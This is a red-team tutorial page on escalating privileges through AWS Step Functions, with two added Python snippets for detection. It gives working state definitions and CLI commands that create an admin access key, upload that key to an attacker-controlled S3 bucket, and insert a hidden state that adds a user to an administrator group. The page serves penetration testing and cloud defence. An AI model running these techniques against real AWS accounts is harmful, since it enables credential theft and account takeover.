AWS - Step Functions Privesc

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Step Functions

For more information about this AWS service, check:

AWS - Step Functions Enum

Task Resources

These privilege escalation techniques require the use of some AWS Step Functions resources in order to perform the desired privilege escalation actions.

To check all the possible actions, you can go to your own AWS account, select the action you would like to use and see the parameters it takes, as in:

Or you can also go to the AWS API documentation and check the documentation of each action:

states:TestState & iam:PassRole

An attacker with the states:TestState & iam:PassRole permissions could test any state and pass any IAM role to it without creating or updating an existing state machine, which could enable unauthorized access to other AWS services with the permissions of that role. Together, these permissions could lead to many unauthorized actions, from manipulating workflows or altering data to data exfiltration, resource compromise and privilege escalation.

aws stepfunctions test-state --definition <value> --role-arn <value> [--input <value>] [--inspection-level <value>] [--reveal-secrets | --no-reveal-secrets]

The following example shows how to test a state that creates an access key for the admin user, using these permissions and a permissive role in the AWS environment. This permissive role should have any highly privileged policy attached (for example arn:aws:iam::aws:policy/AdministratorAccess) that allows the state to perform the iam:CreateAccessKey action:

  • stateDefinition.json:
{
  "Type": "Task",
  "Parameters": {
    "UserName": "admin"
  },
  "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
  "End": true
}
  • Command executed to perform the privesc:
aws stepfunctions test-state --definition file://stateDefinition.json --role-arn arn:aws:iam::<account-id>:role/PermissiveRole

{
  "output": "{
    \"AccessKey\":{
      \"AccessKeyId\":\"AKIA1A2B3C4D5E6F7G8H\",
      \"CreateDate\":\"2024-07-09T16:59:11Z\",
      \"SecretAccessKey\":\"1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j1a2b3c4d5e6f7g8h9i0j\",
      \"Status\":\"Active\",
      \"UserName\":\"admin\"
    }
  }",
  "status": "SUCCEEDED"
}

Potential Impact: Unauthorized execution and manipulation of workflows and access to sensitive resources, which could lead to significant security breaches.

states:CreateStateMachine & iam:PassRole & (states:StartExecution | states:StartSyncExecution)

An attacker with states:CreateStateMachine & iam:PassRole would be able to create a state machine and assign it any IAM role, allowing unauthorized access to other AWS services with the permissions of that role. Unlike the previous privesc technique (states:TestState & iam:PassRole), this one does not execute by itself; you will also need the states:StartExecution or states:StartSyncExecution permission to start an execution of the state machine. (states:StartSyncExecution is not available for standard workflows, only for express state machines.)

# Create a state machine
aws stepfunctions create-state-machine --name <value> --definition <value> --role-arn <value> [--type <STANDARD | EXPRESS>] [--logging-configuration <value>]\
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]

# Start a state machine execution
aws stepfunctions start-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]

# Start a Synchronous Express state machine execution
aws stepfunctions start-sync-execution --state-machine-arn <value> [--name <value>] [--input <value>] [--trace-header <value>]

The following example shows how to create a state machine that creates an access key for the admin user and exfiltrates that access key to an attacker-controlled S3 bucket, using these permissions and a permissive role in the AWS environment. This permissive role should have any highly privileged policy attached (for example arn:aws:iam::aws:policy/AdministratorAccess) that allows the state machine to perform the iam:CreateAccessKey and s3:PutObject actions.

  • stateMachineDefinition.json:
{
  "Comment": "Malicious state machine to create IAM access key and upload to S3",
  "StartAt": "CreateAccessKey",
  "States": {
    "CreateAccessKey": {
      "Type": "Task",
      "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
      "Parameters": {
        "UserName": "admin"
      },
      "ResultPath": "$.AccessKeyResult",
      "Next": "PrepareS3PutObject"
    },
    "PrepareS3PutObject": {
      "Type": "Pass",
      "Parameters": {
        "Body.$": "$.AccessKeyResult.AccessKey",
        "Bucket": "attacker-controlled-S3-bucket",
        "Key": "AccessKey.json"
      },
      "ResultPath": "$.S3PutObjectParams",
      "Next": "PutObject"
    },
    "PutObject": {
      "Type": "Task",
      "Resource": "arn:aws:states:::aws-sdk:s3:putObject",
      "Parameters": {
        "Body.$": "$.S3PutObjectParams.Body",
        "Bucket.$": "$.S3PutObjectParams.Bucket",
        "Key.$": "$.S3PutObjectParams.Key"
      },
      "End": true
    }
  }
}
  • Command executed to create the state machine:
aws stepfunctions create-state-machine --name MaliciousStateMachine --definition file://stateMachineDefinition.json --role-arn arn:aws:iam::123456789012:role/PermissiveRole
{
  "stateMachineArn": "arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine",
  "creationDate": "2024-07-09T20:29:35.381000+02:00"
}
  • Command executed to start an execution of the previously created state machine:
aws stepfunctions start-execution --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:MaliciousStateMachine
{
  "executionArn": "arn:aws:states:us-east-1:123456789012:execution:MaliciousStateMachine:1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
  "startDate": "2024-07-09T20:33:35.466000+02:00"
}

Warning

The attacker-controlled S3 bucket must have a policy that allows the s3:PutObject action from the victim account.

Potential Impact: Unauthorized execution and manipulation of workflows and access to sensitive resources, which could lead to significant security breaches.
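As an added detection example (not part of the original page), the following Python filters CloudTrail-style records for the three Step Functions control-plane calls used in this page's techniques (TestState, CreateStateMachine, UpdateStateMachine) and flags any whose definition invokes IAM or STS through the aws-sdk integration. The records are constructed, and it assumes requestParameters carries the roleArn and the definition string that the CLI commands above send.

```python
import json

# Task resources worth flagging: the aws-sdk integration lets a state call
# IAM (or STS) directly, which is what the examples on this page rely on.
SENSITIVE_PREFIXES = ("arn:aws:states:::aws-sdk:iam:", "arn:aws:states:::aws-sdk:sts:")
STATES_EVENTS = {"TestState", "CreateStateMachine", "UpdateStateMachine"}


def task_resources(node):
    """Yield every Task 'Resource' in a definition (a single state or a whole
    machine), descending into Parallel branches and Map item processors."""
    if isinstance(node, dict):
        if node.get("Type") == "Task" and isinstance(node.get("Resource"), str):
            yield node["Resource"]
        for value in node.values():
            yield from task_resources(value)
    elif isinstance(node, list):
        for item in node:
            yield from task_resources(item)


def suspicious_states_events(records):
    """Return (eventName, roleArn, sensitive resources) for Step Functions
    control-plane calls whose definition reaches IAM/STS via the SDK integration."""
    hits = []
    for rec in records:
        if rec.get("eventSource") != "states.amazonaws.com" or rec.get("eventName") not in STATES_EVENTS:
            continue
        params = rec.get("requestParameters") or {}
        definition = params.get("definition", {})
        if isinstance(definition, str):  # the API carries the definition as a JSON string
            definition = json.loads(definition)
        flagged = sorted({r for r in task_resources(definition) if r.startswith(SENSITIVE_PREFIXES)})
        if flagged:
            hits.append((rec["eventName"], params.get("roleArn"), flagged))
    return hits


# Constructed CloudTrail-style records (not real captures); requestParameters is
# assumed to carry roleArn and the definition string the CLI commands above send.
SAMPLE_RECORDS = [
    {"eventSource": "states.amazonaws.com", "eventName": "TestState",
     "requestParameters": {"roleArn": "arn:aws:iam::123456789012:role/PermissiveRole",
                           "definition": json.dumps({"Type": "Task", "Parameters": {"UserName": "admin"},
                                                     "Resource": "arn:aws:states:::aws-sdk:iam:createAccessKey",
                                                     "End": True})}},
    {"eventSource": "states.amazonaws.com", "eventName": "CreateStateMachine",
     "requestParameters": {"name": "HelloWorldLambda", "roleArn": "arn:aws:iam::123456789012:role/HelloWorldRole",
                           "definition": json.dumps({"StartAt": "Invoke", "States": {"Invoke": {
                               "Type": "Task", "Resource": "arn:aws:states:::lambda:invoke", "End": True}}})}},
]
```

Only the TestState record is reported, because the Hello World machine only reaches Lambda; a real deployment would feed CloudTrail events from S3 or CloudWatch Logs and alert on the roleArn as well.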

states:UpdateStateMachine & (not always required) iam:PassRole

An attacker with the states:UpdateStateMachine permission could modify the definition of a state machine, adding hidden states that could lead to privilege escalation. This way, when a legitimate user starts an execution of the state machine, the new malicious state will run and the privilege escalation will succeed.

Depending on how permissive the IAM Role associated with the state machine is, the attacker will face 2 situations:

  1. Permissive IAM Role: If the IAM Role associated with the state machine already has broad permissions (for example it has the arn:aws:iam::aws:policy/AdministratorAccess policy attached), then the iam:PassRole permission will not be required for the privilege escalation, since it will not be necessary to change the IAM Role; modifying the state machine definition will be enough.
  2. Not permissive IAM Role: Unlike the previous case, here the attacker will also need the iam:PassRole permission, because it will be necessary to associate a highly permissive IAM Role with the state machine in addition to modifying its definition.
aws stepfunctions update-state-machine --state-machine-arn <value> [--definition <value>] [--role-arn <value>] [--logging-configuration <value>] \
[--tracing-configuration <enabled=true|false>] [--publish | --no-publish] [--version-description <value>]

The following example shows how to update a legitimate state machine that only invokes a HelloWorld Lambda function, in order to add an extra state that adds the user unprivilegedUser to the administrator IAM Group. This way, when a legitimate user starts an execution of the updated state machine, the new hidden malicious state will run and the privilege escalation will succeed.

Warning

If the state machine does not have a highly permissive IAM Role associated, the iam:PassRole permission will also be required in order to update the IAM Role and associate a highly permissive one (for example one with the arn:aws:iam::aws:policy/AdministratorAccess policy attached).

  • Legitimate state machine definition (before the update):
{
  "Comment": "Hello world from Lambda state machine",
  "StartAt": "Start PassState",
  "States": {
    "Start PassState": {
      "Type": "Pass",
      "Next": "LambdaInvoke"
    },
    "LambdaInvoke": {
      "Type": "Task",
      "Resource": "arn:aws:states:::lambda:invoke",
      "Parameters": {
        "FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"
      },
      "Next": "End PassState"
    },
    "End PassState": {
      "Type": "Pass",
      "End": true
    }
  }
}
  • Command executed to update the legitimate state machine:
aws stepfunctions update-state-machine --state-machine-arn arn:aws:states:us-east-1:123456789012:stateMachine:HelloWorldLambda --definition file://StateMachineUpdate.json
{
  "updateDate": "2024-07-10T20:07:10.294000+02:00",
  "revisionId": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f"
}

Potential Impact: Unauthorized execution and manipulation of workflows and access to sensitive resources, which could lead to significant security breaches.
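As an added example (not from the original page), a small revision differ that a defender can run over the definition field of two describe-state-machine results (or two stored copies of the definition) to surface states inserted by an UpdateStateMachine call. LEGIT is the Hello World definition shown above; TAMPERED is constructed here to mirror the hidden-state scenario this section describes.

```python
import json

IAM_SDK_PREFIX = "arn:aws:states:::aws-sdk:iam:"


def diff_definitions(before: str, after: str) -> dict:
    """Compare two state machine definitions (JSON strings, e.g. the 'definition'
    of two revisions returned by describe-state-machine) and report what changed."""
    old = json.loads(before).get("States", {})
    new = json.loads(after).get("States", {})
    added = sorted(set(new) - set(old))
    return {
        "added": added,
        "removed": sorted(set(old) - set(new)),
        # A changed existing state is usually the rewired "Next" that routes
        # the legitimate flow through the inserted state.
        "changed": sorted(k for k in set(old) & set(new) if old[k] != new[k]),
        # Newly added Task states that call IAM through the SDK integration
        # are exactly the hidden-state pattern described above.
        "iam_tasks_added": [k for k in added if new[k].get("Type") == "Task"
                            and str(new[k].get("Resource", "")).startswith(IAM_SDK_PREFIX)],
    }


# Constructed revisions: LEGIT is the Hello World definition shown above; TAMPERED
# is what a revision that inserts a hidden IAM task behind it might look like.
LEGIT = json.dumps({
    "Comment": "Hello world from Lambda state machine",
    "StartAt": "Start PassState",
    "States": {
        "Start PassState": {"Type": "Pass", "Next": "LambdaInvoke"},
        "LambdaInvoke": {"Type": "Task", "Resource": "arn:aws:states:::lambda:invoke",
                         "Parameters": {"FunctionName": "arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"},
                         "Next": "End PassState"},
        "End PassState": {"Type": "Pass", "End": True},
    },
})
_tampered = json.loads(LEGIT)
_tampered["States"]["LambdaInvoke"]["Next"] = "AddUserToGroup"
_tampered["States"]["AddUserToGroup"] = {
    "Type": "Task", "Resource": IAM_SDK_PREFIX + "addUserToGroup",
    "Parameters": {"UserName": "unprivilegedUser", "GroupName": "administrator"},
    "Next": "End PassState",
}
TAMPERED = json.dumps(_tampered)
```

Pairing this with the revisionId returned by update-state-machine lets a review pipeline block or alert on any revision whose iam_tasks_added list is non-empty.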
